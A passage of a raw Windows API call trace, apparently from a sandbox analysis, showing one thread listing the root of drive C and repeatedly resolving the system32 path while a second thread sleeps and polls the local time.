lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0128.338] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x41e788, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0128.354] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFile") returned 0x0 [0128.358] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0128.362] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0128.362] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x41e9d4 | out: lpFindFileData=0x41e9d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x77ab30 [0128.368] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFile") returned 0x0 [0128.372] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0128.372] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0128.373] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0128.373] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0128.373] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0128.373] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0128.373] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0128.374] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0128.374] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xf456e360, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0128.374] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0128.374] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe0a0d1e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0a0d1e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0128.375] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0128.375] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0128.375] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0128.375] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0128.375] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0128.376] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0128.376] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x41e9e4 | out: lpFindFileData=0x41e9e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0128.376] FindClose (in: hFindFile=0x77ab30 | out: hFindFile=0x77ab30) returned 1 [0128.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x41ec6c) returned 1 [0128.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x41ec78) returned 1 [0128.583] CoTaskMemAlloc (cb=0x20c) returned 0x7b17b0 [0128.583] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b17b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0128.584] CoTaskMemFree (pv=0x7b17b0) [0128.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.584] CoTaskMemAlloc (cb=0x20c) returned 0x7b17b0 [0128.584] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b17b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0128.584] CoTaskMemFree (pv=0x7b17b0) [0128.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0130.959] CoTaskMemAlloc (cb=0x20c) returned 0x7b5010 [0130.959] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b5010 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0130.959] CoTaskMemFree (pv=0x7b5010) [0130.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0130.959] CoTaskMemAlloc (cb=0x20c) returned 0x7b5010 [0130.959] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b5010 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0130.959] CoTaskMemFree (pv=0x7b5010) [0130.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.217] CoTaskMemAlloc (cb=0x20c) returned 0x7b2fb8 [0131.217] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b2fb8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.217] CoTaskMemFree (pv=0x7b2fb8) [0131.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.217] CoTaskMemAlloc (cb=0x20c) returned 0x7b2fb8 [0131.217] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b2fb8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.217] CoTaskMemFree (pv=0x7b2fb8) [0131.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.217] CoTaskMemAlloc (cb=0x20c) returned 0x7b2fb8 [0131.217] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b2fb8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.217] CoTaskMemFree (pv=0x7b2fb8) [0131.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.300] CoTaskMemAlloc (cb=0x20c) returned 0x7b3a00 [0131.300] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b3a00 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.300] CoTaskMemFree (pv=0x7b3a00) [0131.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.301] CoTaskMemAlloc (cb=0x20c) returned 0x7b3a00 [0131.301] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b3a00 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.301] CoTaskMemFree (pv=0x7b3a00) [0131.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.382] CoTaskMemAlloc (cb=0x20c) returned 0x7b4380 [0131.382] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b4380 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.382] CoTaskMemFree (pv=0x7b4380) [0131.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.382] CoTaskMemAlloc (cb=0x20c) returned 0x7b4380 [0131.383] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b4380 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.383] CoTaskMemFree (pv=0x7b4380) [0131.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.454] CoTaskMemAlloc (cb=0x20c) returned 0x7b4ba0 [0131.454] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b4ba0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.455] CoTaskMemFree (pv=0x7b4ba0) [0131.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.455] CoTaskMemAlloc (cb=0x20c) returned 0x7b4ba0 [0131.455] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b4ba0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.455] CoTaskMemFree (pv=0x7b4ba0) [0131.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.885] CoTaskMemAlloc (cb=0x20c) returned 0x7b9830 [0133.885] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b9830 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0133.885] CoTaskMemFree (pv=0x7b9830) [0133.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.885] CoTaskMemAlloc (cb=0x20c) returned 0x7b9830 [0133.885] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b9830 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0133.885] CoTaskMemFree (pv=0x7b9830) [0133.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0134.108] CoTaskMemAlloc (cb=0x20c) returned 0x7b5510 [0134.108] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b5510 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0134.108] CoTaskMemFree (pv=0x7b5510) [0134.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0134.108] CoTaskMemAlloc (cb=0x20c) returned 0x7b5510 [0134.108] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b5510 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0134.108] CoTaskMemFree (pv=0x7b5510) [0134.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0134.280] CoTaskMemAlloc (cb=0x20c) returned 0x776840 [0134.280] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x776840 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0134.280] CoTaskMemFree (pv=0x776840) [0134.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0134.280] CoTaskMemAlloc (cb=0x20c) returned 0x776840 [0134.280] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x776840 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0134.280] CoTaskMemFree (pv=0x776840) [0134.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0134.280] CoTaskMemAlloc (cb=0x20c) returned 0x776840 [0134.280] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x776840 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0134.280] CoTaskMemFree (pv=0x776840) [0134.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0134.281] CoTaskMemAlloc (cb=0x20c) returned 0x776840 [0134.281] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x776840 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0134.281] CoTaskMemFree (pv=0x776840) [0134.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0134.350] CoTaskMemAlloc (cb=0x20c) returned 0x7b9830 [0134.350] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b9830 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0134.350] CoTaskMemFree (pv=0x7b9830) [0134.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0134.351] CoTaskMemAlloc (cb=0x20c) returned 0x7b9830 [0134.351] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b9830 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0134.351] CoTaskMemFree (pv=0x7b9830) [0134.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 Thread: id = 2 os_tid = 0xa9c [0053.585] GetTickCount () returned 0x11471d6 [0053.585] Sleep (dwMilliseconds=0x3e8) [0055.767] Sleep (dwMilliseconds=0x3e8) [0056.781] Sleep (dwMilliseconds=0x3e8) [0057.795] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x22, wMilliseconds=0x391)) [0057.795] Sleep (dwMilliseconds=0x3e8) [0058.808] Sleep (dwMilliseconds=0x3e8) [0059.824] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x24, wMilliseconds=0x3ad)) [0059.824] Sleep (dwMilliseconds=0x3e8) [0062.104] Sleep (dwMilliseconds=0x3e8) [0063.232] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x26, wMilliseconds=0x3c9)) [0063.232] Sleep (dwMilliseconds=0x3e8) [0064.298] Sleep (dwMilliseconds=0x3e8) [0065.424] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x28, wMilliseconds=0x3e5)) [0065.424] Sleep (dwMilliseconds=0x3e8) [0066.442] Sleep (dwMilliseconds=0x3e8) [0067.451] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x2b, wMilliseconds=0x19)) [0067.451] Sleep (dwMilliseconds=0x3e8) [0068.465] Sleep (dwMilliseconds=0x3e8) [0069.511] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x2d, wMilliseconds=0x54)) [0069.511] Sleep (dwMilliseconds=0x3e8) [0070.555] Sleep (dwMilliseconds=0x3e8) [0071.574] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x2f, wMilliseconds=0x90)) [0071.574] Sleep (dwMilliseconds=0x3e8) [0072.599] Sleep (dwMilliseconds=0x3e8) [0073.629] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x31, wMilliseconds=0xcb)) [0073.630] Sleep (dwMilliseconds=0x3e8) [0074.662] Sleep (dwMilliseconds=0x3e8) [0075.688] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x33, wMilliseconds=0x106)) [0075.688] Sleep (dwMilliseconds=0x3e8) [0076.702] Sleep (dwMilliseconds=0x3e8) [0077.747] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x35, wMilliseconds=0x141)) [0077.747] Sleep (dwMilliseconds=0x3e8) [0079.043] Sleep (dwMilliseconds=0x3e8) [0080.867] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x37, wMilliseconds=0x276)) [0080.868] Sleep (dwMilliseconds=0x3e8) [0081.881] Sleep (dwMilliseconds=0x3e8) [0085.395] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x39, wMilliseconds=0x292)) [0085.395] Sleep (dwMilliseconds=0x3e8) [0087.630] Sleep (dwMilliseconds=0x3e8) [0088.637] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x3b, wMilliseconds=0x2be)) [0088.637] Sleep (dwMilliseconds=0x3e8) [0089.665] Sleep (dwMilliseconds=0x3e8) [0090.680] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x1, wMilliseconds=0x2da)) [0090.680] Sleep (dwMilliseconds=0x3e8) [0091.694] Sleep (dwMilliseconds=0x3e8) [0092.708] GetLocalTime (in: lpSystemTime=0x106f85c | out: 